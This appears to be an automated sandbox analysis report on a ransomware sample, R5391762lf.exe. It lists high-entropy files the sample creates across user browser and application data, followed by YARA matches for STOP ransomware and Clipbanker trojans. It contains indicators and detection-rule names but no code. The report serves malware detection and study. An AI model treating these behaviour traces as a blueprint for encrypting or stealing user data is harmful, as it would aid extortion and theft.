Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{407fe2cc-e6ee-4027-aa00-b9fdf3f5b8e5}\0.0.filtertrie.intermediate.txt entropy: 7.99501322308	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{407fe2cc-e6ee-4027-aa00-b9fdf3f5b8e5}\Apps.ft entropy: 7.99630082306	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{fe191046-14e8-4e49-a1f5-f429b2cab500}\0.0.filtertrie.intermediate.txt entropy: 7.99494323525	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{fe191046-14e8-4e49-a1f5-f429b2cab500}\Apps.ft entropy: 7.99625430983	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite entropy: 7.99782047452	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite-shm entropy: 7.99440118908	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\extensions.json entropy: 7.99564797422	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm entropy: 7.99484848224	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite entropy: 7.99794244234	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{764e754d-fbdd-43df-9a27-cbb01dbf5078}\settingsglobals.txt entropy: 7.99603497915	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{764e754d-fbdd-43df-9a27-cbb01dbf5078}\settingssynonyms.txt entropy: 7.99831612302	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db entropy: 7.99424341354	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\protections.sqlite entropy: 7.99758801283	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm entropy: 7.99400985366	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\ls-archive.sqlite entropy: 7.99856327341	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite-shm entropy: 7.99372797459	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite entropy: 7.99811281887	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.log entropy: 7.99781333085	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Google Profile.ico entropy: 7.99867362714	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\edgeSettings_2.0-2f9188b68640dbf72295f9083a21d674a314721ef06f82db281cbcb052ff8ec1 entropy: 7.99845883427	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db entropy: 7.99579507464	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico entropy: 7.99733099531	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule230170v1.xml entropy: 7.9923683457	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\AppData\Local\D3DSCache\f4d41c5d09ae781\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx entropy: 7.99752940284	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt entropy: 7.99233122789	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\ConnectedDevicesPlatform\L.jones\ActivitiesCache.db-shm entropy: 7.99438488563	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCache\webext.sc.lz4 entropy: 7.99834613663	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Microsoft\Windows\Safety\edge\remote\script_300161259571223429446516194326035503227.rel.v2 entropy: 7.99768010462	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Microsoft\Windows\Safety\shell\remote\script_96032244749497702726114603847611723578.rel.v2 entropy: 7.99448189766	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\DL2P1Z6X\pwa-vendors~left-nav-rc.52c45571d19ede0a7005.chunk.v7[1].js entropy: 7.99191962208	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\IINQQITY\pwa-left-nav-rc.6c288f9aff9797959103.chunk.v7[1].js entropy: 7.99454333944	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule230172v1.xml entropy: 7.99400170358	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\DL2P1Z6X\sharedscripts-939520eada[1].js entropy: 7.99602027292	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\DL2P1Z6X\staticpwascripts-30998bff8f[1].js entropy: 7.99151353087	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\IINQQITY\pwa-bootstrap-5e7af218e953d095fabf[1].js entropy: 7.99747176827	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\LCNHN4MU\pwa-bundle-994d8943fc9264e2f8d3[1].css entropy: 7.99797401094	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\LCNHN4MU\otel-logger-104bffe9378b8041455c[1].js entropy: 7.99803845753	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\IINQQITY\thirdpartynotice[1].htm entropy: 7.99812169117	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\KAT9HXAG\hero-image-desktop-f6720a4145[1].jpg entropy: 7.99869458876	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\KAT9HXAG\microsoft-365-logo-01d5ecd01a[1].png entropy: 7.99165732054	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\KAT9HXAG\pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7[1].css entropy: 7.99572126397	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\KAT9HXAG\pwa-forms-group~mru~officeforms-group-forms~officeforms-my-forms~places.bcdc404c7fe22f14ccad.chunk.v7[1].js entropy: 7.99606946202	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AC\INetCache\HSLUET3E\bootstrap_3.3.0_B68S-_daR6nLiLVZsh4XiA2[1].js entropy: 7.99503242913	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AC\INetCache\HSLUET3E\jqueryshim_hlu0tTfjWJFWYNt1WZrVqg2[1].js entropy: 7.99200572659	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\LCNHN4MU\pwa-mru.9ba2d4c9e339ba497e10.chunk.v7[1].js entropy: 7.99576473501	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Packages\Microsoft.SkypeApp_kzf8qxf38zg5c\AC\INetCache\GOGXYOSL\1446_8.53.0[1].json entropy: 7.99868349208	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AC\INetCache\DLAKQVF0\accountcorepackage_7RPOlbJQzUEPp9Cr7jKSkg2[1].js entropy: 7.99674148084	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AC\INetCache\HSLUET3E\knockout_3.3.0_X1BYS2jZMbi7hfUj8VuqFA2[1].js entropy: 7.99783392581	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AC\INetCache\HSLUET3E\knockout_old_GJ62c6D9R5HuKFdkoO8XYw2[1].js entropy: 7.99765016412	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AC\INetCache\I8BK050T\jquerypackage_1.10_5V7LAuc3bNAQx2QQfr1RPw2[1].js entropy: 7.998077835	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AC\INetCache\I8BK050T\lwsignuphoststringscountrybirthdate_en-gb_tXeUWmrL4gUQDx-AaHVz2g2[1].js entropy: 7.99465943577	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin entropy: 7.99719653437	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\first_party_sets.db entropy: 7.99602168894	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\AppData\Local\Microsoft\input\en-GB\userdict_v1.0809.dat entropy: 7.99243757391	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db entropy: 7.9926170532	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officec2rclient.exe.db entropy: 7.9922022504	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db entropy: 7.99238683786	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officesetup.exe.db entropy: 7.99339908654	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000010.db entropy: 7.99828637478	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000011.db entropy: 7.99830563002	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000003.db entropy: 7.99741106909	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000004.db entropy: 7.99820591351	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ExplorerStartupLog_RunOnce.etl entropy: 7.99297719272	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Shell\DefaultLayouts.xml entropy: 7.99719262863	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\IconCache.db entropy: 7.99306300377	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\Local Settings\IconCache.db.bgjs (copy) entropy: 7.99306300377	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\Local Settings\Temp\wctEA40.tmp.bgjs (copy) entropy: 7.99762679	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\Local Settings\D3DSCache\f4d41c5d09ae781\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx.bgjs (copy) entropy: 7.99752940284	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\Local Settings\Temp\acrobat_sbx\acroNGLLog.txt.bgjs (copy) entropy: 7.99233122789	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\Local Settings\ConnectedDevicesPlatform\L.jones\ActivitiesCache.db-shm.bgjs (copy) entropy: 7.99438488563	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\Local Settings\Adobe\Acrobat\DC\UserCache64.bin.bgjs (copy) entropy: 7.99719653437	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\Local Settings\Google\Chrome\User Data\first_party_sets.db.bgjs (copy) entropy: 7.99602168894	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\Local Settings\Microsoft\input\en-GB\userdict_v1.0809.dat.bgjs (copy) entropy: 7.99243757391	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\Local Settings\Microsoft\Office\OTele\excel.exe.db.bgjs (copy) entropy: 7.9926170532	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\Local Settings\Microsoft\Office\OTele\officec2rclient.exe.db.bgjs (copy) entropy: 7.9922022504	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\Local Settings\Microsoft\Office\OTele\officeclicktorun.exe.db.bgjs (copy) entropy: 7.99238683786	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\Local Settings\Microsoft\Office\OTele\officesetup.exe.db.bgjs (copy) entropy: 7.99339908654	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000010.db.bgjs (copy) entropy: 7.99828637478	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000011.db.bgjs (copy) entropy: 7.99830563002	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000003.db.bgjs (copy) entropy: 7.99741106909	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000004.db.bgjs (copy) entropy: 7.99820591351	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\Local Settings\Microsoft\Windows\Explorer\ExplorerStartupLog_RunOnce.etl.bgjs (copy) entropy: 7.99297719272	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\Local Settings\Microsoft\Windows\Shell\DefaultLayouts.xml.bgjs (copy) entropy: 7.99719262863	Jump to dropped file
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\76561199673019888[1].htm entropy: 7.99525587095	Jump to dropped file

System Summary

Malicious sample detected (through community Yara rule)

Source: 16.2.build3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 16.2.build3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 20.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 20.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 30.2.mstsca.exe.8615a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 30.2.mstsca.exe.8615a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 19.2.mstsca.exe.9615a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 19.2.mstsca.exe.9615a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 27.2.mstsca.exe.9215a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 27.2.mstsca.exe.9215a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 28.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 28.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 31.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 31.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 32.2.mstsca.exe.9615a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 32.2.mstsca.exe.9615a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 13.2.build3.exe.8515a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 13.2.build3.exe.8515a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 31.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 31.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 33.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 33.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 16.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 16.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 28.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 28.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 27.2.mstsca.exe.9215a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 27.2.mstsca.exe.9215a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 5.2.R5391762lf.exe.5db15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.2.R5391762lf.exe.5db15a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 20.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 20.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 19.2.mstsca.exe.9615a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 19.2.mstsca.exe.9615a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 13.2.build3.exe.8515a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 13.2.build3.exe.8515a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 33.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 33.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 30.2.mstsca.exe.8615a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 30.2.mstsca.exe.8615a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 32.2.mstsca.exe.9615a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 32.2.mstsca.exe.9615a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0.2.R5391762lf.exe.5ea15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0.2.R5391762lf.exe.5ea15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.2.R5391762lf.exe.5ec15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.2.R5391762lf.exe.5ec15a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.2.R5391762lf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.2.R5391762lf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 23.2.R5391762lf.exe.5e115a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 23.2.R5391762lf.exe.5e115a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 23.2.R5391762lf.exe.5e115a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 23.2.R5391762lf.exe.5e115a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 12.2.R5391762lf.exe.5da15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 12.2.R5391762lf.exe.5da15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 2.2.R5391762lf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 2.2.R5391762lf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 14.2.R5391762lf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 14.2.R5391762lf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.2.R5391762lf.exe.5ec15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.2.R5391762lf.exe.5ec15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 5.2.R5391762lf.exe.5db15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.2.R5391762lf.exe.5db15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 12.2.R5391762lf.exe.5da15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 12.2.R5391762lf.exe.5da15a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 24.2.R5391762lf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 24.2.R5391762lf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 14.2.R5391762lf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 14.2.R5391762lf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
